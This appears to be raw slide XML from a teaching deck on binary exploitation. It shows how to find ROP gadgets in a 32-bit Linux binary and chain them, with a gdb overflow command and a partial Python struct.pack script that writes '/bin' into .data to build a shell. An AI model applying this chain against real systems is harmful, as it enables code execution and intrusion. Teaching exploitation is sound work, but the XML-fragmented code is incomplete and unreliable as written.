                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946821" y="1567206"/>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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff64c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff650</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784903" y="545637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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="930259"/>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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="5053162"/>
            <a:ext cx="6256324" cy="70776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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260445" y="4763613"/>
            <a:ext cx="3696160" cy="378658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2540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479672" y="647899"/>
            <a:ext cx="2831284" cy="365172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2540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5091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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, a pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret gadget will put the next value on the stack into the %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need a gadget to get our data into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>0x80bb6d6 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x80481c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>Pop %ecx, ret at 0x80e4bd1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x80541b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>0x807b406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>int 0x80 at 0x80493e1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>Now we can build our shellcode!</a:t>
            </a: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181</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15681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Building the ROP chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We’ve reached the point where building the ROP payload by hand is tedious (that little endian)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> +' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So let’s write our payload in a Python script</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182</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1568721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8155"/>
            <a:ext cx="8229600" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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50 * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</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0x0806e91a) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</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0x080ea060) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</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0x080bb6d6) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</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0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
